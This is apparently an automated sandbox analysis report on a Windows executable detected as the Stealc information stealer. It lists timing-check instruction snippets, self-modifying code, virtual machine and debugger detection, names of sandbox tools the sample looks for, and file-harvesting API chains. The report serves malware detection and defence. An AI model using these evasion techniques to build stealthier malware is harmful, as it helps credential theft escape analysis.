Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC41B4 second address: DC41BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC41BA second address: DC41C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DCA3E0 second address: DCA401 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edi 0x00000006 jmp 00007F0D34B70909h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DCA401 second address: DCA406 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DCA406 second address: DCA40B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DCA40B second address: DCA420 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F0D344F4AB6h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f je 00007F0D344F4AB6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DD7C82 second address: DD7C8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DD7C8B second address: DD7C8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DD7C8F second address: DD7C99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DDC18A second address: DDC1B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F0D344F4AB6h 0x0000000a jmp 00007F0D344F4AC7h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 pop eax 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DDC1B0 second address: DDC1BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DDC1BD second address: DDC1C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DDC1C1 second address: DDC1DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F0D34B70907h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DE930E second address: DE9314 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DEB0E5 second address: DEB105 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jno 00007F0D34B70902h 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DEB105 second address: DEB110 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F0D344F4AB6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DEB110 second address: DEB11A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F0D34B708F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DEB11A second address: DEB120 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DED8BC second address: DED8CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007F0D34B708F8h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DED8CC second address: DED8E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D344F4AC8h 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DF4396 second address: DF439A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DF463D second address: DF4642 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DF4642 second address: DF465B instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0D34B70902h 0x00000008 pushad 0x00000009 push esi 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DF4AA1 second address: DF4AA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DF72B8 second address: DF72D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D34B708FCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jns 00007F0D34B708F6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DFB000 second address: DFB03A instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0D344F4ABEh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F0D344F4ABFh 0x00000010 pushad 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 jns 00007F0D344F4AB6h 0x00000019 jns 00007F0D344F4AB6h 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 jng 00007F0D344F4AB6h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DFAD5B second address: DFAD5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E17B34 second address: E17B3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F0D344F4AB6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E17B3E second address: E17B5C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D34B70904h 0x00000007 push eax 0x00000008 push edx 0x00000009 jnp 00007F0D34B708F6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E277B3 second address: E277E9 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0D344F4AB6h 0x00000008 jmp 00007F0D344F4AC5h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F0D344F4AC4h 0x00000014 push edi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E27DE9 second address: E27E10 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0D34B708F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jl 00007F0D34B70911h 0x00000010 jmp 00007F0D34B70905h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E29C4A second address: E29C84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F0D344F4AE2h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E29C84 second address: E29C8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E2C7E3 second address: E2C813 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jc 00007F0D344F4ACDh 0x0000000d popad 0x0000000e push eax 0x0000000f pushad 0x00000010 pushad 0x00000011 push edi 0x00000012 pop edi 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 push edi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E2C813 second address: E2C85C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ebp 0x0000000a call 00007F0D34B708F8h 0x0000000f pop ebp 0x00000010 mov dword ptr [esp+04h], ebp 0x00000014 add dword ptr [esp+04h], 00000017h 0x0000001c inc ebp 0x0000001d push ebp 0x0000001e ret 0x0000001f pop ebp 0x00000020 ret 0x00000021 push 00000004h 0x00000023 or dword ptr [ebp+122D1C98h], edx 0x00000029 call 00007F0D34B708F9h 0x0000002e jmp 00007F0D34B708FCh 0x00000033 push eax 0x00000034 push edi 0x00000035 push eax 0x00000036 push edx 0x00000037 push ecx 0x00000038 pop ecx 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E2C85C second address: E2C860 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E2C860 second address: E2C881 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push ebx 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f jmp 00007F0D34B708FAh 0x00000014 popad 0x00000015 pop ebx 0x00000016 mov eax, dword ptr [eax] 0x00000018 pushad 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E2C881 second address: E2C887 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E2CB07 second address: E2CBA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0D34B70904h 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007F0D34B708F8h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 0000001Dh 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 push ebx 0x00000028 add dl, 00000034h 0x0000002b pop edx 0x0000002c sub dh, FFFFFF93h 0x0000002f push dword ptr [ebp+122D1A03h] 0x00000035 push 00000000h 0x00000037 push eax 0x00000038 call 00007F0D34B708F8h 0x0000003d pop eax 0x0000003e mov dword ptr [esp+04h], eax 0x00000042 add dword ptr [esp+04h], 00000016h 0x0000004a inc eax 0x0000004b push eax 0x0000004c ret 0x0000004d pop eax 0x0000004e ret 0x0000004f mov edx, dword ptr [ebp+122D1C8Fh] 0x00000055 call 00007F0D34B708F9h 0x0000005a ja 00007F0D34B70902h 0x00000060 push eax 0x00000061 push edi 0x00000062 pushad 0x00000063 jg 00007F0D34B708F6h 0x00000069 push eax 0x0000006a push edx 0x0000006b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E2CBA0 second address: E2CBB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d jbe 00007F0D344F4AB6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E2CBB3 second address: E2CBB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E2CBB7 second address: E2CBC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E2CBC5 second address: E2CBD3 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0D34B708F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E2CBD3 second address: E2CBEE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e jmp 00007F0D344F4ABCh 0x00000013 pop edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E2E219 second address: E2E21F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E2E21F second address: E2E24E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D344F4AC4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c jmp 00007F0D344F4AC2h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E2E24E second address: E2E268 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F0D34B70905h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54703ED second address: 54703F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54703F2 second address: 5470432 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D34B708FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov esi, ebx 0x0000000d pushad 0x0000000e jmp 00007F0D34B70901h 0x00000013 push esi 0x00000014 pop ebx 0x00000015 popad 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 jmp 00007F0D34B708FAh 0x0000001d mov ebp, esp 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5470432 second address: 5470436 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5470436 second address: 547043A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 547043A second address: 5470440 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: BA1A9C instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: DCCABE instructions caused by: Self-modifying code

Contains capabilities to detect virtual machines

Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Program does not show much activity (idle)

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009538B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_009538B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00954910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00954910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0094DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_0094DA80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0094E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_0094E430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0094ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_0094ED20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00954570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_00954570
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0094F68A FindFirstFileA,	0_2_0094F68A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0094F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0094F6B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00953EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_00953EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009416D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_009416D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0094DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0094DE10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0094BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_0094BE70

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00941160 GetSystemInfo,ExitProcess,

0_2_00941160

Source: file.exe, file.exe, 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.2090680717.0000000001645000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2090680717.0000000001628000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.2090680717.00000000015CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: file.exe, 00000000.00000002.2090680717.0000000001615000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\file.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Checks for debuggers (devices)

Source: C:\Users\user\Desktop\file.exe	File opened: NTICE
Source: C:\Users\user\Desktop\file.exe	File opened: SICE
Source: C:\Users\user\Desktop\file.exe	File opened: SIWVID

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_009445C0 VirtualProtect ?,00000004,00000100,00000000

0_2_009445C0

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\file.exe

0_2_00959860

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00959750 mov eax, dword ptr fs:[00000030h]

0_2_00959750

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_009578E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,

0_2_009578E0

Program does not show much activity (idle)

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\file.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: file.exe PID: 1216, type: MEMORYSTR

Searches for specific processes (likely to inject)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00959600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_00959600

Source: file.exe, file.exe, 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: DProgram Manager

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\file.exe

Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,

0_2_00957B90

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\file.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00957980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,

0_2_00957980

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00957850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

0_2_00957850

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00957A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,

0_2_00957A30

Stealing of Sensitive Information

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.940000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.2045915798.00000000052E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2090680717.00000000015CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 1216, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Remote Access Functionality

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.940000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.2045915798.00000000052E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2090680717.00000000015CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 1216, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

ID:	1520474
Product:	CloudBasic
Start time:	11:25:14
Start date:	27.09.2024
Sample:	file.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	219066ac9697d1cdeb536bc4ea74c123
SHA1:	a8f5b34c40766dbf7ae0140c581dc23c5d75918f
SHA256:	ce8350a94bca9e1e552275527845443db7c0d0159e34e53220bfe38fed03e041
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Windows Analysis Report
file.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted URLs

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted URLs

Windows Analysis Report
file.exe

